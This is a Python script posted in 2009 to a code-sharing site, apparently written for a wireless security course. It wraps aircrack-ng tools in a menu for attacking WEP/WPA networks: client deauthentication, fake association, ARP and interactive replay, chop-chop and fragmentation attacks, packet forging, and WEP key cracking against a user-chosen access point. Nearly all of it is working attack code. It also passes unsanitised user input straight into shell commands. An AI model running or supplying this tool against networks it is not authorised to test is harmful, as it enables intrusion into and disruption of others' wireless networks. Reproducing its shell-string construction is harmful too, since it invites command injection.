Code-Bin #328 - wifi

wifi_audit.py
Posted by: mrme | July 14, 2009 @ 11:56pm

Python Code

#!/usr/bin/python
# WEP and WPA Auditing tool
# Coded by MrMe
# Uses aircrack-ng 'http://aircrack-ng.org/doku.php'
# WARNING: This script assumes you know something about wifi
# I write this script because I cant remember syntax :(
# Also made to destroy the wifu exam
#

import hashlib, sys, os,fileinput, re, time, thread 
from optparse import OptionParser 
 
usage= "./%prog -i interface" 
usage = usage+"\nExample: ./%prog -i ath0" 
parser = OptionParser(usage=usage) 
parser.add_option("-i", type="string", 
                  action="store", dest="intf", 
                  help="Your interface") 
(options, args) = parser.parse_args()

def banner():
	print "\n|---------------------------------------------------|" 
	print "|    WEP & WPA auditing tool made during WIFU :)    |" 
	print "|                 by MrMe 07/2009                   |" 
	print "|---------------------------------------------------|\n" 
	
def is_there_aircrack():
	booya = os.popen("aircrack-ng")
	if not re.search("http://www.aircrack-ng.org",booya.read()):
		banner()
		print "[-] Please install aircrack-ng before continuing"
		print "[-] apt-get install aircrack-ng"
		print "[-] yum install aircrack-ng"
		sys.exit(0)
 
if len(sys.argv) != 3: 
	banner()
   	parser.print_help() 
	sys.exit(1) 
	
# some global variables
verbose = 'true'
intf = options.intf

def reset():
	if intf == 'ath0':
		unload = os.system("rmmod ath_pci")
		load = os.system("modprobe ath_pci")
		print "\n[+] Loaded and ready"
	elif intf == 'wlan0':
		unload = os.system("rmmod r8187")
		load = os.system("modprobe r8187")
		print "\n[+] Loaded and ready"
	else:
		print "[-] Interface not supported for this option"
		
def targetSetup():
	kill = os.system("airmon-ng stop "+intf)
	if intf == 'ath0':
		exe = os.system('airmon-ng start wifi0')
	else:
		exe = os.system('airmon-ng start '+intf)
	
def execute():
	run = 'on'
	while run == 'on':
		print "\n|--------------------------------|"
		print "|      Select an option type     |" 
		print "|--------------------------------|\n"
		print "[1] Reset the driver modules"
		print "[2] Setup wifi NIC and choose target"
		print "[3] Injection test against target" 
		print "[4] De-authenticate a client" 
		print "[5] Fake associate with the AP" 
		print "[6] Shared key fake association"
		print "[7] Interactive packet replay" 
		print "[8] Arp request replay" 
		print "[9] Korek chop chop attack" 
		print "[10] Fragmentation attack" 
		print "[11] Forge and inject using the xor file"
		print "[12] Crack the WEP key"
		print "[13] Exit\n" 
		option=raw_input('[+] Please enter a value: ')
	
        	if option == '13':
			print "[+] Hope you had fun"
			sys.exit(0)
		if option == '1':
			reset()
		if option == '2':
			targetSetup()
			print "\n[+] Gathering target information.."
			airo = 'xterm -T "Searching for target AP\'s" -e airodump-ng '+intf
			exec_=os.popen(airo)
			time.sleep(3)
			ch=raw_input('[+] Please enter target channel: ')
			ch = str(ch)
			bssid=raw_input('[+] Please enter the target BSSID: ')
			while len(bssid) != 17:
				print '\n[-] Check your BSSID and enter it again. Eg: 00:1b:2f:67:9b:f3'
				bssid=raw_input('[+] Please enter the target BSSID: ')
			essid=raw_input('[+] Please enter the target ESSID: ')
			mymac=raw_input('[+] Please enter the MAC addess for '+intf+': ')
			while len(mymac) != 17:
				print '\n[-] Check your MAC address and enter it again. Eg: 00:1b:2f:67:9b:f3'
				mymac=raw_input('[+] Please enter the MAC addess for '+intf+': ')
			if not bssid or not essid or not ch:
				print '\n[-] Please enter the details correctly next time.. exiting..'
				sys.exit(0)
			print "[+] Setting up your interface for the specifid target.."
			kill = os.system("airmon-ng stop "+intf)
			if intf == 'ath0':
				cmd = 'airmon-ng start wifi0 '+ch
				exe = os.system(cmd)
			else:
				exe = os.system('airmon-ng start '+intf+' '+ch)
			dump = 'xterm -T "Dumping target" -e airodump-ng -c '+ch+' --bssid '+bssid+' -w '+essid+' '+intf+' &'
			exe_dump = os.system(dump)
			time.sleep(3)
			print '\n[+] Ready to rock and roll! :)'
		if option == '3':
			print "[+] Testing AP please wait.."
			test1 = 'aireplay-ng -9 -e "'+essid+'" -a '+bssid+' '+intf
			test = os.popen(test1)
			if verbose == 'true':
				print "[+] Command: "+test1+'\n'
				print test.read()
			if re.search("No such BSSID",test.read()):
				print "[-] Please check your BSSID!"
				sys.exit(0)
			else:
				print "[+] Injection is working!"		
		if option == '4':
			client=raw_input('[+] Please enter the targets clients MAC: ')
			print "[+] Deauth'ing with 1 packets please wait.."
			attack2 = 'aireplay-ng -0 1 -e "'+essid+'" -a '+bssid+' -c '+client+' '+intf
			exe = os.popen(attack2)
			if verbose == 'true':
				print '[+] Command: "'+attack2+'"\n'
				print exe.read()
		if option == '5':
			
			print "[+] Associating with the AP please wait.."
			test1 = 'aireplay-ng -1 0 -e "'+essid+'" -a '+bssid+' -h '+mymac+' '+intf
			test = os.popen(test1)
			if verbose == 'true':
				print '[+] Command: "'+test1+'"\n'
				print test.read()
		if option == '6':
			print "[+] Associating with the AP please wait.."
			print "[+] Using shared key.."
			asso = 'aireplay-ng -1 0 -e "'+essid+'" -y '+essid+'*.xor -a '+bssid+' -h '+mymac+' '+intf
			exec_shaasso = os.popen(asso)
			if verbose == 'true':
				print '[+] Command: "'+asso+'"\n'
				print exec_shaasso.read()
		if option == '7':
			print "[+] Starting interactive packet replay attack.."
			inter = 'aireplay-ng -2 -b '+bssid+' -d FF:FF:FF:FF:FF:FF -t 1 '+intf
			if verbose == 'true':
				print "[+] Command: "+inter+'\n'
				print "[+] Now try deauth'ing a client or wait.."
				print "[+] If you get a ARP packet then crack the key"
			exe = os.system(inter)
		if option == '8':
			print "[+] Starting ARP request replay attack.."
			print "[+] If you get a ARP packet then crack the key"
			arp = 'aireplay-ng -3 -b '+bssid+' -h '+mymac+' '+intf
			if verbose == 'true':
				print "[+] Command: "+arp+'\n'
			test = os.system(arp)
		if option == '9':
			print "[+] Starting Korek chop chop attack.."
			chop = 'aireplay-ng -4 -h '+mymac+' -b '+bssid+' '+intf
			if verbose == 'true':
				print '[+] Command: "'+chop+'"\n'	
			exe = os.system(chop)
		if option == '10':
			print "[+] Starting fragmentation attack.."
			frag = 'aireplay-ng -5 -b '+bssid+' -h '+mymac+' '+intf
			if verbose == 'true':
				print '[+] Command: "'+frag+'"\n'	
			exe = os.system(frag)
		if option == '11':
			print "[+] Forging arbitary data packet.."
			forge = 'packetforge-ng -0 -a '+bssid+' -h '+mymac+' -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-request'
			if verbose == 'true':
				print '[+] Command: "'+forge+'"\n'	
			exe = os.system(forge)	
			print "[+] Now lets inject the forged packet :)"
			inject = 'xterm -T "Injecting forged packet" -e "aireplay-ng -2 -r arp-request "'+intf+' &'
			exe_dump = os.system(inject)
			time.sleep(3)
		if option == '12':
			print "[+] Crack time!"
			print "[+] aircrack-ng -0 -z "+essid+"*.cap\n"
			crack = 'xterm -T "Cracking.." -e "aircrack-ng -0 -z '+essid+'*.cap; bash"\n'
			exe_crack = os.system(crack)
is_there_aircrack()
banner()
execute()

Syntax Highlighting

[Open in new window]

Author Comments

none

Rating

4.52 / 8
126 Votes